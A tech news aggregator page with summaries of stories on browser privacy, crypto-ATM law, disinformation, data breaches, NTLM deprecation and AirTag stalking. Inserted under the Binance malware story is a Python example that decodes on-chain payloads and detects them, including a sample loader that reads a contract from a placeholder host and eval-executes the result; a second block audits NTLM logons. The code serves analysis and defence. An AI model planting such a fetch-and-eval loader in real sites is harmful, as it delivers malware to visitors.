Google

Google Chrome's New 'IP Protection' Will Hide Users' IP Addresses (bleepingcomputer.com)

Google is getting ready to test a new "IP Protection" feature for the Chrome browser that enhances users' privacy by masking their IP addresses using proxy servers. From a report: Recognizing the potential misuse of IP addresses for covert tracking, Google seeks to strike a balance between ensuring users' privacy and the essential functionalities of the web. IP addresses allow websites and online services to track activities across websites, thereby facilitating the creation of persistent user profiles. This poses significant privacy concerns as, unlike third-party cookies, users currently lack a direct way to evade such covert tracking.

While IP addresses are potential vectors for tracking, they are also indispensable for critical web functionalities like routing traffic, fraud prevention, and other vital network tasks. The "IP Protection" solution addresses this dual role by routing third-party traffic from specific domains through proxies, making users' IP addresses invisible to those domains. As the ecosystem evolves, so will IP Protection, adapting to continue safeguarding users from cross-site tracking and adding additional domains to the proxied traffic. "Chrome is reintroducing a proposal to protect users against cross-site tracking via IP addresses. This proposal is a privacy proxy that anonymizes IP addresses for qualifying traffic as described above," reads a description of the IP Protection feature. Initially, IP Protection will be an opt-in feature, ensuring users have control over their privacy and letting Google monitor behavior trends.

Bitcoin

California Law Limits Bitcoin ATM Transactions to $1,000 to Thwart Scammers (msn.com)

One 80-year-old retired teacher in Los Angeles lost $69,000 in bitcoin to scammers. And 46,000 people lost over $1 billion to crypto scams since 2021 (according to America's Federal Trade Commission).

Now the Los Angeles Times reports California's new moves against scammers using bitcoin ATMs, with a bill one representative says "is about ensuring that people who have been frauded in our communities don't continue to watch our state step aside when we know that these are real problems that are happening." Starting in January, California will limit cryptocurrency ATM transactions to $1,000 per day per person under Senate Bill 401, which Gov. Gavin Newsom signed into law. Some bitcoin ATM machines advertise limits as high as $50,000... Victims of bitcoin ATM scams say limiting the transactions will give people more time to figure out they're being tricked and prevent them from using large amounts of cash to buy cryptocurrency.

But crypto ATM operators say the new laws will harm their industry and the small businesses they pay to rent space for the machines. There are more than 3,200 bitcoin ATMs in California, according to Coin ATM Radar, a site that tracks the machines' locations. "This bill fails to adequately address how to crack down on fraud, and instead takes a punitive path focused on a specific technology that will shudder the industry and hurt consumers, while doing nothing to stop bad actors," said Charles Belle, executive director of the Blockchain Advocacy Coalition...

Law enforcement has cracked down on unlicensed crypto ATMs, but it can be tough for consumers to tell how serious the industry is about addressing the concerns. In 2020, a Yorba Linda man pleaded guilty to charges of operating unlicensed bitcoin ATMs and failing to maintain an anti-money-laundering program even though he knew criminals were using the funds. The illegal business, known as Herocoin, allowed people to buy and sell bitcoin in transactions of up to $25,000 and charged a fee of up to 25%.

So there are also provisions in the law against exorbitant fees: The new law also bars bitcoin ATM operators from collecting fees higher than $5 or 15% of the transaction, whichever is greater, starting in 2025. Legislative staff members visited a crypto kiosk in Sacramento and found markups as high as 33% on some digital assets when they compared the prices at which cryptocurrency is bought and sold. Typically, a crypto ATM charges fees between 12% and 25% over the value of the digital asset, according to a legislative analysis...

Another law would by July 2025 require digital financial asset businesses to obtain a license from the California Department of Financial Protection and Innovation.

Social Networks

Online 'Information War' in Africa Rages on Social Media (yahoo.com)

The Washington Post tells the story of a veteran political operative and a former army intelligence officer hired to help keep in power the president of the west African nation Burkina Faso: Their company, Percepto International, was a pioneer in what's known as the disinformation-for-hire business. They were skilled in deceptive tricks of social media, reeling people into an online world comprised of fake journalists, news outlets and everyday citizens whose posts were intended to bolster support for [president Roch Marc] Kaboré's government and undercut its critics. But as Percepto began to survey the online landscape across Burkina Faso and the surrounding French-speaking Sahel region of Africa in 2021, they quickly saw that the local political adversaries and Islamic extremists they had been hired to combat were not Kaboré's biggest adversary. The real threat, they concluded, came from Russia, which was running what appeared to be a wide-ranging disinformation campaign aimed at destabilizing Burkina Faso and other democratically-elected governments on its borders.

Pro-Russian fake news sites populated YouTube and pro-Russian groups abounded on Facebook. Local influencers used WhatsApp and Telegram groups to organize pro-Russian demonstrations and praise Russian President Vladimir Putin. Facebook fan pages even hailed the Wagner Group, the Russian paramilitary network run by Yevgeniy Prigozhin, the late one-time Putin ally whose Internet Research Agency launched a disinformation campaign in the United States to influence the 2016 presidential election... Percepto didn't know the full scope of the operation it had uncovered but it warned Kaboré's government that it needed to move fast: Launch a counteroffensive online — or risk getting pushed out in a coup.

Three years later, the governments of five former French colonies, including Burkina Faso, have been toppled. The new leaders of two of those countries, Mali and Burkina Faso, are overtly pro-Russian; in a third, Niger, the prime minister installed after a July coup has met recently with the Russian ambassador. In Mali and the Central African Republic, French troops have been replaced with Wagner mercenaries...

Percepto's experience in French-speaking Africa offers a rare window into the round-the-clock information warfare that is shaping international politics — and the booming business of disinformation-for-hire. Meta, the social media company that operates Facebook, Instagram and WhatsApp, says that since 2017 it has detected more than 200 clandestine influence operations, many of them mercenary campaigns, in 68 countries.

The article also makes an interesting point. "The burden of battling disinformation has fallen entirely on Silicon Valley companies."

Earth

Plans Abandoned for First 1,300-Mile Carbon-Capture Pipeline Across the US (arstechnica.com)

"A company backed by BlackRock has abandoned plans to build a 1,300-mile pipeline across the US Midwest to collect and store carbon emissions from the corn ethanol industry," reports Ars Technica.

The move comes "following opposition from landowners and some environmental campaigners." Navigator CO2 on Friday said developing its carbon capture and storage (CCS) project called Heartland Greenway had been "challenging" because of the unpredictable nature of regulatory and government processes in South Dakota and Iowa. Navigator's decision to scrap its flagship $3.1 billion project — one of the biggest of its kind in the US — is a blow for a fledgling industry... It also represents a setback for the carbon-intensive corn ethanol refining industry, a pillar of the rural Midwestern economy which is targeting industry-scale CCS as a way to reduce emissions...

The project faced opposition from local landowners, who expressed concerns about safety and property seizures, and some environmentalists who describe CO2 pipelines as dangerous and a way to prop up the fossil fuels industry, which already has a network of such infrastructure. Addressing the decision by Navigator, the Coalition To Stop CO2 Pipelines said it "celebrates this victory," but added: "we also know that the tax incentives made available by the federal government for carbon capture, transport and storage likely mean another entity will pick up Navigator's project, or find a different route through Illinois."

The article cites one analyst at energy research firm Wood Mackenzie who believes this cancellation could benefit rival carbon-capture companies like Summit Carbon Solutions, which is planning an even larger network of CO2 pipelines throughout the Midwest, and could try to sign deals with Navigator's former customers.

Crime

Scammers Try Hosting Their Malware on a Binance Network (krebsonsecurity.com)

Breached web sites distribute malware to visitors by claiming they need to update their browser. But one group of attackers "have developed an ingenious way of keeping their malware from being taken down by security experts or law enforcement," reports security researcher Brian Krebs.

"By hosting the malicious files on a decentralized, anonymous cryptocurrency blockchain." [W]hen Cloudflare blocked those accounts the attackers began storing their malicious files as cryptocurrency transactions in the Binance Smart Chain (BSC), a technology designed to run decentralized apps and "smart contracts," or coded agreements that execute actions automatically when certain conditions are met. Nati Tal, head of security at Guardio Labs, the research unit at Tel Aviv-based security firm Guardio, said the malicious scripts stitched into hacked WordPress sites will create a new smart contract on the BSC Blockchain, starting with a unique, attacker-controlled blockchain address and a set of instructions that defines the contract's functions and structure. When that contract is queried by a compromised website, it will return an obfuscated and malicious payload.

"These contracts offer innovative ways to build applications and processes," Tal wrote along with his Guardio colleague Oleg Zaytsev. "Due to the publicly accessible and unchangeable nature of the blockchain, code can be hosted 'on-chain' without the ability for a takedown." Tal said hosting malicious files on the Binance Smart Chain is ideal for attackers because retrieving the malicious contract is a cost-free operation that was originally designed for the purpose of debugging contract execution issues without any real-world impact. "So you get a free, untracked, and robust way to get your data (the malicious payload) without leaving traces," Tal said.
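
The mechanics Tal describes, as an added example in Python that is not Guardio's or KrebsOnSecurity's code: the first half reproduces what an injected loader does with a contract reply (ABI-decode the returned string, then base64-decode the stored script), and the second half is a defender-side heuristic that flags page JavaScript in which a contract read feeds `eval()`. It assumes the read is a gas-free JSON-RPC `eth_call` whose result is an ABI-encoded `string`, which is the "cost-free" query path the article alludes to; the RPC endpoint, contract address, payload and code snippets below are constructed placeholders, not artifacts from the campaign.

```python
"""Added example (not Guardio's or KrebsOnSecurity's code): what an on-chain
loader does with a contract reply, and a heuristic to flag such loaders in a
site's JavaScript. Assumption: the read is a gas-free JSON-RPC `eth_call` whose
result is an ABI-encoded `string`; the RPC endpoint, contract address and
payload below are constructed placeholders."""
import base64
import json
import re


def abi_encode_string(s: str) -> str:
    """ABI-encode a dynamic `string`: 32-byte offset, 32-byte length, padded bytes."""
    b = s.encode()
    pad = (-len(b)) % 32
    head = (32).to_bytes(32, "big") + len(b).to_bytes(32, "big")
    return "0x" + (head + b + b"\x00" * pad).hex()


def abi_decode_string(hex_data: str) -> str:
    """Inverse of the above, with the bounds checks an attacker's loader skips."""
    raw = bytes.fromhex(hex_data[2:] if hex_data.startswith("0x") else hex_data)
    if len(raw) < 64:
        raise ValueError("too short for an ABI-encoded string")
    offset = int.from_bytes(raw[:32], "big")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(raw):
        raise ValueError("declared length runs past the returned data")
    return raw[start:start + length].decode()


def extract_payload(rpc_response: str) -> str:
    """Recover the script a compromised page would execute: ABI-decode the
    eth_call result, then base64-decode the stored (obfuscated) payload."""
    result = json.loads(rpc_response)["result"]
    return base64.b64decode(abi_decode_string(result)).decode()


# Constructed stand-in for the JSON-RPC reply a loader would receive.
PAYLOAD_JS = 'console.log("constructed payload")'
SAMPLE_RPC_RESPONSE = json.dumps({
    "jsonrpc": "2.0",
    "id": 1,
    "result": abi_encode_string(base64.b64encode(PAYLOAD_JS.encode()).decode()),
})

# Heuristic: a contract read whose result reaches a dynamic-execution sink.
CONTRACT_READ = re.compile(r"eth_call|\.eth\.Contract\(|\.methods\.\w+\([^)]*\)\.call\(")
DYNAMIC_EXEC = re.compile(r"\beval\(|new Function\(|document\.write\(|\.innerHTML\s*=")


def flag_onchain_loader(page_js: str) -> dict:
    """Flag page JavaScript that reads a contract and feeds the result to eval()."""
    read = bool(CONTRACT_READ.search(page_js))
    exe = bool(DYNAMIC_EXEC.search(page_js))
    return {"contract_read": read, "dynamic_exec": exe, "suspicious": read and exe}


# Constructed snippets in the shape of an injected loader and of benign page code.
INJECTED_SNIPPET = """
var w3 = new Web3("https://bsc-rpc.example/");              // placeholder endpoint
var c = new w3.eth.Contract(abi, "0x" + "00".repeat(20));   // placeholder address
c.methods.get().call().then(function (r) { eval(atob(r)); });
"""
BENIGN_SNIPPET = 'fetch("/api/items").then(r => r.json()).then(render);'

if __name__ == "__main__":
    print(extract_payload(SAMPLE_RPC_RESPONSE))
    print(flag_onchain_loader(INJECTED_SNIPPET), flag_onchain_loader(BENIGN_SNIPPET))
```

The bounds checks in `abi_decode_string` matter as soon as you point the decoder at arbitrary contract output: a hostile length field is the one thing the loader itself never validates. The regex heuristic is deliberately coarse; it is a triage filter for sweeping WordPress themes and plugins, not a verdict.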

In response to questions from KrebsOnSecurity, the BNB Smart Chain (BSC) said its team is aware of the malware abusing its blockchain, and is actively addressing the issue. The company said all addresses associated with the spread of the malware have been blacklisted, and that its technicians had developed a model to detect future smart contracts that use similar methods to host malicious scripts. "This model is designed to proactively identify and mitigate potential threats before they can cause harm," BNB Smart Chain wrote. "The team is committed to ongoing monitoring of addresses that are involved in spreading malware scripts on the BSC. To enhance their efforts, the tech team is working on linking identified addresses that spread malicious scripts to centralized KYC [Know Your Customer] information, when possible."

The Media

What Happens When Major Online Platforms Lower Traffic to News Sites? (yahoo.com)

"The major online platforms are breaking up with news," reports the New York Times: Campbell Brown, Facebook's top news executive, said this month that she was leaving the company. Twitter, now known as X, removed headlines from the platform days later. The head of Instagram's Threads app, an X competitor, reiterated that his social network would not amplify news. Even Google — the strongest partner to news organizations over the past 10 years — has become less dependable, making publishers more wary of their reliance on the search giant. The company has laid off news employees in two recent team reorganizations, and some publishers say traffic from Google has tapered off... Some executives of the largest tech companies, like Adam Mosseri at Instagram, have said in no uncertain terms that hosting news on their sites can often be more trouble than it is worth because it generates polarized debates...

Publishers seem resigned to the idea that traffic from the big tech companies will not return to what it once was. Even in the long-fractious relationship between publishers and tech platforms, the latest rift stands out — and the consequences for the news industry are stark. Many news companies have struggled to survive after the tech companies threw the industry's business model into upheaval more than a decade ago. One lifeline was the traffic — and, by extension, advertising — that came from sites like Facebook and Twitter. Now that traffic is disappearing. Top news sites got about 11.5% of their web traffic in the United States from social networks in September 2020, according to Similarweb, a data and analytics company. By September this year, it was down to 6.5%...

The sharp decline in referral traffic from social media platforms over the past two years has hit all news publishers, including The New York Times. The Wall Street Journal noticed a decline starting about 18 months ago, according to a recording of a September staff meeting obtained by the Times. "We are at the mercy of social algorithms and tech giants for much of our distribution," Emma Tucker, the Journal's editor-in-chief, told the newsroom in the meeting...

Google cut some members of its news partnership team in September, and this week it laid off as many as 45 workers from its Google News team, the Alphabet Workers Union said. (The Information, a tech news website, reported the Google News layoffs earlier.) "We've made some internal changes to streamline our organization," Jenn Crider, a Google spokesperson, said in a statement... Jaffer Zaidi [Google's vice president of global news partnerships], wrote in an internal memo reviewed by the Times that the team would be adopting more artificial intelligence. "We had to make some difficult decisions to better position our team for what lies ahead," he wrote...

Privately, a number of publishers have discussed what a post-Google traffic future may look like and how to better prepare if Google's AI products become more popular and further bury links to news publications.

Power

BMW, Mini, Rolls-Royce, Toyota, and Lexus Are Switching To Tesla's EV Charging Standard (arstechnica.com)

Toyota and BMW are two of the latest automakers to announce they're adopting Tesla's North American Charging System (NACS) plug for their North American EVs, giving drivers access to Tesla's Supercharger network. Ars Technica reports: BMW's announcement applies to all its car brands, which means that in addition to EVs like the BMW i5 or i7, it's also swapping over to NACS for the upcoming Mini EVs as well as the Rolls-Royce Spectre. BMW will start adding native NACS ports to its EVs in 2025, and that same year its customers will gain access to the Tesla Supercharger network. BMW's release doesn't explicitly mention a CCS1-NACS adapter being made available, but it does say that BMW (and Mini and Rolls-Royce) EVs with CCS1 ports will be able to use Superchargers from early 2025.

Similarly, the Toyota news applies to its brand as well as Lexus. Toyota says that it will start incorporating NACS ports into "certain Toyota and Lexus BEVs starting in 2025." And customers with Toyota or Lexus EVs that have a CCS1 port will be offered an adapter allowing them to use NACS chargers, also in 2025. And -- you guessed it -- 2025 is when Toyota and Lexus EVs gain access to the Supercharger network.

While virtually all the brands that sell EVs in the North American market have announced the switch, there are still a couple holdouts. Stellantis has yet to make the switch, "meaning Alfa Romeo, Chrysler, Dodge, Fiat, Jeep, Maserati, and Ram are all sticking with CCS1 for now," reports Ars.

"Volkswagen Group has also yet to take the plunge, which means that Audi and Porsche are also staying with CCS1 for now, as well as the soon-to-be-reborn Scout brand." That said, they're expected to announce a switch to the NACS plug any day now.

Privacy

Casio Keyed Up After Data Loss Hits Customers In 149 Countries (theregister.com)

Jessica Lyons Hardcastle reports via The Register: Japanese electronics giant Casio said miscreants broke into its ClassPad server and stole a database with personal information belonging to customers in 149 countries. ClassPad is Casio's education web app, and in a Wednesday statement on its website, the firm said an intruder breached a ClassPad server and swiped hundreds of thousands of "items" belonging to individuals and organizations around the globe. As of October 18, the crooks accessed 91,921 items belonging to Japanese customers, including individuals and 1,108 educational institution customers, as well as 35,049 items belonging to customers from 148 other countries. If Casio finds additional customers were compromised, it promises to update this count.

The data included customers' names, email addresses, country of residence, purchasing info including order details, payment method and license code, and service usage info including log data and nicknames. Casio noted that it does not retain customers' credit card information, so presumably people's banking info wasn't compromised in the hack. An employee discovered the incident on October 11 while attempting to work in the corporate dev environment and spotted the database failure. "At this time, it has been confirmed that some of the network security settings in the development environment were disabled due to an operational error of the system by the department in charge and insufficient operational management," the official notice said. "Casio believes these were the causes of the situation that allowed an external party to gain unauthorized access." The intruder didn't access the ClassPad.net app, according to Casio, so that is still available for use.

Transportation

Amazon Plans To Deploy Delivery Drones In the UK and Italy Next Year (theverge.com)

Amazon announced today that it plans to expand its Prime Air drone delivery program to Italy and the United Kingdom, as well as one more yet-to-be-named U.S. city. "The new Prime Air locations will be announced in the coming months, with an anticipated launch date of late 2024," reports The Verge. From the report: Another step by Amazon today suggests it's ready to make drones a more serious part of its actual delivery network. The company said it plans to add Prime Air delivery to its existing fulfillment network -- specifically by adding delivery drones to some of its same-day delivery sites. Prime Air drones currently only operate out of the two standalone sites in Texas and California, so expanding drones to other sites means a wider delivery range and closer integration with Amazon's delivery network.

Amazon also gave us a sneak peek of its new Prime Air delivery drone that it claims flies twice as far as its current model. Even more critically, the drones will be able to operate in light rain and what Amazon calls more "diverse weather." The company released photos of the MK30 drone today, which it said will replace its existing delivery drones by late 2024.

The MK30 is also smaller and quieter than the existing Prime Air model, Amazon claims. The new drone can deliver objects of up to five pounds, with a typical delivery time of "one hour or less." The new drone includes a "sense and avoid" feature that can help it avoid pets, people, and property. The new design will hopefully result in smoother flights.

"Not only will this help boost the economy, offering consumers even more choice while helping keep the environment clean with zero emission technology, but it will also build our understanding how to best use the new technology safely and securely," said UK's Aviation Minister Baroness Vere in a statement in Amazon's announcement.

China

Five Eyes Intelligence Chiefs Warn on China's 'Theft' of IP (reuters.com)

The Five Eyes countries' intelligence chiefs came together on Tuesday to accuse China of intellectual property theft and using artificial intelligence for hacking and spying against the nations, in a rare joint statement by the allies. From a report: The officials from the United States, Britain, Canada, Australia and New Zealand - known as the Five Eyes intelligence sharing network - made the comments following meetings with private companies in the U.S. innovation hub Silicon Valley. U.S. FBI Director Christopher Wray said the "unprecedented" joint call was meant to confront the "unprecedented threat" China poses to innovation across the world.

From quantum technology and robotics to biotechnology and artificial intelligence, China was stealing secrets in various sectors, the officials said. "China has long targeted businesses with a web of techniques all at once: cyber intrusions, human intelligence operations, seemingly innocuous corporate investments and transactions," Wray said. "Every strand of that web had become more brazen, and more dangerous." In response, Chinese government spokesman Liu Pengyu said the country was committed to intellectual property protection.

Movies

'Netflix Effect' Returns As Studios License Old Shows To Their Streaming Rival (ft.com)

Christopher Grimes reports via the Financial Times: Some of Netflix's competitors are reversing a streaming war tactic by licensing their old TV shows and movies to the streamer -- boosting its programming offerings but also potentially squeezing its profit margins, analysts say. Netflix relied heavily on programming that it licensed from other companies when it launched its streaming service in 2007. But after Walt Disney, NBCUniversal, Paramount and the then Time Warner launched their own streaming services, they pulled many of their shows from Netflix to avoid feeding a company that had grown into an arch-competitor. With legacy media groups under pressure to produce streaming profits, however, licensing revenue is looking attractive again -- even if it comes from Netflix. This summer, Warner Bros Discovery's HBO network began licensing a handful of older shows to Netflix, including Insecure, Six Feet Under, Ballers and Band of Brothers.

Analysts at Morgan Stanley said the return of licensing deals was a "long-term positive" for Netflix and would "pad" its lead over competitors in streaming. But the bank added that the cost of licensing -- along with Netflix's investments in gaming and other sectors -- could add pressure to its profit margins in 2024. The analysts raised their outlook for Netflix's overall cash spending next year by $500mn to $17.7bn. Netflix will report results on Wednesday, with investors expected to focus on whether it plans to increase subscription prices and signs of progress on its new advertising tier. The latest data on its password sharing crackdown will also be watched.

[T]he studios' experiments with licensing deals appear to have given some old shows new life. After NBCUniversal licensed its show Suits -- which aired from 2011-19 and starred Meghan Markle -- to Netflix in June, the show experienced a revival. The legal drama was in the top spot on the Nielsen Streaming top 10 for three months, an example of the "Netflix effect" on older shows. [HBO chief Casey] Bloys said licensing shows to Netflix had also boosted traffic for the programs on Warner Discovery's Max streaming platform, home to HBO programming including Ballers, a sports drama that ran from 2015-19. Ballers entered the Nielsen top 10 after it went to Netflix, and Insecure, a comedy starring Issa Rae that ran from 2016-21, had a similar boost.

Crime

Tech CEO Sentenced To 5 Years in IP Address Scheme (krebsonsecurity.com)

Amir Golestan, the 40-year-old CEO of the Charleston, S.C. based technology company Micfo, has been sentenced to five years in prison for wire fraud. From a report: Golestan's sentencing comes nearly two years after he pleaded guilty to using an elaborate network of phony companies to secure more than 735,000 Internet Protocol (IP) addresses from the American Registry for Internet Numbers (ARIN), the nonprofit which oversees IP addresses assigned to entities in the U.S., Canada, and parts of the Caribbean.

In 2018, ARIN sued Golestan and Micfo, alleging they had obtained hundreds of thousands of IP addresses under false pretenses. ARIN and Micfo settled that dispute in arbitration, with Micfo returning most of the addresses that it hadn't already sold. ARIN's civil case caught the attention of federal prosecutors in South Carolina, who in May 2019 filed criminal wire fraud charges against Golestan, alleging he'd orchestrated a network of shell companies and fake identities to prevent ARIN from knowing the addresses were all going to the same buyer.

Advertising

Comcast Resists Call To Stop Its Misleading '10G Network' Claims (arstechnica.com)

Jon Brodkin reports via Ars Technica: An advertising industry group urged Comcast to stop its "10G" ads or modify them to state that 10G is an "aspirational" technology rather than something the company actually provides on its cable network today. The National Advertising Division (NAD), part of the advertising industry's self-regulatory system run by BBB National Programs, ruled against Comcast after a challenge lodged by T-Mobile. In its decision announced Thursday, the NAD recommended that Comcast "discontinue its '10G' claims" or "modify its advertising to (a) make clear that it is implementing improvements that will enable it to achieve '10G' and that it is aspirational or (b) use '10G' in a manner that is not false or misleading, consistent with this decision."

Comcast plans to appeal the decision, so it won't make any changes to marketing immediately. If Comcast loses the appeal and agrees to change its practices, it would affect more than just a few ads because Comcast now calls its entire broadband network "10G." "In February 2023, Comcast rebranded its fixed Internet network as 'Xfinity 10G Network' to signify technological upgrades to its network that are continuing to be implemented," the NAD said. Comcast's website claims that the "Xfinity 10G Network is already here! You'll see continual increases in network speed and reliability. No action is required on your part to join the Xfinity 10G Network." It also claims that 10G is "complementary" to the 5G mobile network.

Microsoft

To 'Evolve' Windows Authentication, Microsoft Wants to Eventually Disable NTLM in Windows 11 (neowin.net)

An anonymous reader shared this report from Neowin: The various versions of Windows have used Kerberos as their main authentication protocol for over 20 years. However, in certain circumstances, the OS has to use another method, NTLM (NT LAN Manager). Today, Microsoft announced that it is expanding the use of Kerberos, with the plan to eventually ditch the use of NTLM altogether.

In a blog post, Microsoft stated that NTLM continues to be used by some businesses and organizations for Windows authentication because it "doesn't require local network connection to a Domain Controller." It also is "the only protocol supported when using local accounts" and it "works when you don't know who the target server is." Microsoft states:

These benefits have led to some applications and services hardcoding the use of NTLM instead of trying to use other, more modern authentication protocols like Kerberos. Kerberos provides better security guarantees and is more extensible than NTLM, which is why it is now a preferred default protocol in Windows. The problem is that while businesses can turn off NTLM for authentication, those hardwired apps and services could experience issues. That's why Microsoft has added two new authentication features to Kerberos.

Microsoft's blog post calls it "the evolution of Windows authentication," arguing that "As Windows evolves to meet the needs of our ever-changing world, the way we protect users must also evolve to address modern security challenges..." So, "our team is building new features for Windows 11."
  • Initial and Pass Through Authentication Using Kerberos, or IAKerb, "a public extension to the industry standard Kerberos protocol that allows a client without line-of-sight to a Domain Controller to authenticate through a server that does have line-of-sight."
  • A local Key Distribution Center (KDC) for Kerberos, "built on top of the local machine's Security Account Manager so remote authentication of local user accounts can be done using Kerberos."
  • "We are also fixing hard-coded instances of NTLM built into existing Windows components... shifting these components to use the Negotiate protocol so that Kerberos can be used instead of NTLM... NTLM will continue to be available as a fallback to maintain existing compatibility."
  • "We are also introducing improved NTLM auditing and management functionality to give your organization more insight into your NTLM usage and better control for removing it."

"Reducing the use of NTLM will ultimately culminate in it being disabled in Windows 11. We are taking a data-driven approach and monitoring reductions in NTLM usage to determine when it will be safe to disable."
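
Microsoft's "data-driven" approach is one any organisation can mirror before flipping its own switch. As an added example (Python, not Microsoft's code), the block below tallies Security event 4624 logons by authentication package, counts NTLM logons per source host, and lists the hosts still negotiating NTLMv1; its input is the per-event XML that `wevtutil qe Security` or `Get-WinEvent` (via `.ToXml()`) produces, and the four records here are constructed. The dedicated Microsoft-Windows-NTLM/Operational channel (events 8001-8004, populated once the "Network security: Restrict NTLM: Audit..." policies are enabled) is the other source worth running through the same tally.

```python
"""Added example (not Microsoft's code): inventory NTLM use from Security
event 4624 records before turning NTLM off. Input is the per-event XML that
`wevtutil qe Security` or Get-WinEvent's .ToXml() emits; the records below are
constructed."""
import xml.etree.ElementTree as ET
from collections import Counter

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}


def parse_4624(xml_text: str):
    """Return the logon's protocol and source, or None for non-4624 events."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "4624":
        return None
    data = {d.get("Name"): (d.text or "")
            for d in root.findall("e:EventData/e:Data", NS)}
    pkg = data.get("AuthenticationPackageName", "")
    lm = data.get("LmPackageName", "-")
    # Negotiate that fell back to NTLM still reports an NTLM LmPackageName.
    protocol = "NTLM" if pkg == "NTLM" or lm.startswith("NTLM") else pkg
    return {
        "user": data.get("TargetUserName", ""),
        "protocol": protocol,
        "lm_package": lm,
        "source": data.get("WorkstationName") or data.get("IpAddress", "?"),
        "logon_type": data.get("LogonType", ""),
    }


def summarize(xml_events):
    """Counts an admin needs: protocol split, NTLM per source, NTLMv1 sources."""
    by_protocol, ntlm_by_source, v1 = Counter(), Counter(), set()
    for xml_text in xml_events:
        rec = parse_4624(xml_text)
        if rec is None:
            continue
        by_protocol[rec["protocol"]] += 1
        if rec["protocol"] == "NTLM":
            ntlm_by_source[rec["source"]] += 1
            if rec["lm_package"] == "NTLM V1":
                v1.add(rec["source"])
    return {"by_protocol": dict(by_protocol),
            "ntlm_by_source": dict(ntlm_by_source),
            "ntlmv1_sources": sorted(v1)}


def _event(event_id: str, fields: dict) -> str:
    """Build one constructed record in the Windows event XML layout."""
    data = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{NS["e"]}"><System>'
            f'<Provider Name="Microsoft-Windows-Security-Auditing"/>'
            f'<EventID>{event_id}</EventID></System>'
            f'<EventData>{data}</EventData></Event>')


# Constructed sample: one Kerberos logon, one NTLMv2, one Negotiate that fell
# back to NTLMv1, and a logoff (4634) that the parser must ignore.
SAMPLE_EVENTS = [
    _event("4624", {"TargetUserName": "alice", "LogonType": "3",
                    "AuthenticationPackageName": "Kerberos", "LmPackageName": "-",
                    "WorkstationName": "WS01", "IpAddress": "10.0.0.11"}),
    _event("4624", {"TargetUserName": "svc_backup", "LogonType": "3",
                    "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2",
                    "WorkstationName": "LEGACYAPP01", "IpAddress": "10.0.0.50"}),
    _event("4624", {"TargetUserName": "bob", "LogonType": "3",
                    "AuthenticationPackageName": "Negotiate", "LmPackageName": "NTLM V1",
                    "WorkstationName": "SCANNER7", "IpAddress": "10.0.0.77"}),
    _event("4634", {"TargetUserName": "alice", "LogonType": "3"}),
]

if __name__ == "__main__":
    print(summarize(SAMPLE_EVENTS))
```

Read `ntlm_by_source` as the work list: each host on it is typically either a client with NTLM hardcoded or a target reached by IP or without a usable service principal name, and anything in `ntlmv1_sources` should be fixed first regardless of when the eventual cut-over happens.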


Privacy

Apple AirTags Triggered 'Explosion' of Stalking Reports Nationwide, Lawsuit Says (arstechnica.com)

Ashley Belanger reports via Ars Technica: This month, more than three dozen victims allegedly terrorized by stalkers using Apple AirTags have joined a class-action lawsuit filed in a California court last December against Apple. They alleged in an amended complaint (PDF) that, partly due to Apple's negligence, AirTags have become "one of the most dangerous and frightening technologies employed by stalkers" because they can be easily, cheaply, and covertly used to determine "real-time location information to track victims." Since the lawsuit was initially filed in 2022, plaintiffs have alleged that there has been an "explosion of reporting" showing that AirTags are frequently being used for stalking, including a spike in international AirTags stalking cases and more than 150 police reports in the US as of April 2022. More recently, there were 19 AirTags stalking cases in one US metropolitan area -- Tulsa, Oklahoma -- alone, the complaint said.

This seeming escalation is concerning, plaintiffs say, because Apple allegedly has not done enough to mitigate harms, and AirTags stalking can lead to financial ruin, as victims bear significant costs like hiring mechanics to strip their cars to locate AirTags or repeatedly relocating their homes. AirTags stalking can also end in violence, including murder, plaintiffs alleged, and the problem is likely bigger than anyone knows, because stalking is historically underreported. [...] Many plaintiffs said they had no clue what AirTags were when they first discovered hidden AirTags were being used to monitor their moves. At the very least, plaintiffs want Apple to be responsible for raising awareness of how AirTags are used by stalkers -- not just to inform people who are at risk of stalking but also to ensure law enforcement is aware. Plaintiffs have alleged that Apple did not provide information to police that prevented them from accessing protective orders and pressing criminal charges. The complaint also suggested other remedies Apple could provide, like improving the consistency of AirTag alerts, which plaintiffs claimed only sometimes appeared on iPhones, so that users are always aware when an AirTag is nearby. "Apple continues to find itself in the position of reacting to the harms its product has unleashed, as opposed to prophylactically preventing those harms," the complaint said.

A technology specialist for the National Network to End Domestic Violence, Corbin Streett, is also quoted in the complaint, pointing out that Apple's threat model seemed to only consider risks of strangers using AirTags for unwanted stalking, not abusive partners. That's a problem since advocacy groups like the federally funded Stalking Prevention, Awareness, & Resource Center report (PDF) that the "vast majority of stalking victims are stalked by someone they know" and "intimate partner stalkers are the most likely stalkers to approach, threaten, and harm their victims." "I hope Apple keeps their learning hat on and works to figure out that piece of the puzzle," Streett said.

Open Source

Europe Mulls Open Sourcing TETRA Emergency Services' Encryption Algorithms (theregister.com) 18

Jessica Lyons Hardcastle reports via The Register: The European Telecommunications Standards Institute (ETSI) may open source the proprietary encryption algorithms used to secure emergency radio communications after a public backlash over security flaws found this summer. "The ETSI Technical Committee in charge of TETRA algorithms is discussing whether to make them public," Claire Boyer, a spokesperson for the European standards body, told The Register. The committee will discuss the issue at its next meeting on October 26, she said, adding: "If the consensus is not reached, it will go to a vote."

TETRA is the Terrestrial Trunked Radio protocol, which is used in Europe, the UK, and other countries to secure radio communications used by government agencies, law enforcement, military and emergency services organizations. In July, a Netherlands security biz uncovered five vulnerabilities in TETRA, two deemed critical, that could allow criminals to decrypt communications, including in real-time, to inject messages, deanonymize users, or set the session key to zero for uplink interception. At the time ETSI downplayed the flaws, which it said had been fixed last October, and noted that "it's not aware of any active exploitation of operational networks."

It did, however, face criticism from the security community over its response to the vulnerabilities -- and over the proprietary nature of the encryption algorithms, which makes proper pentesting of the emergency network system more difficult.

"This whole idea of secret encryption algorithms is crazy, old-fashioned stuff," said security author Kim Zetter who first reported the story. "It's very 1960s and 1970s and quaint. If you're not publishing [intentionally] weak algorithms, I don't know why you would keep the algorithms secret."

United States

Who Runs the Best US Schools? It May Be the Defense Department (nytimes.com) 94

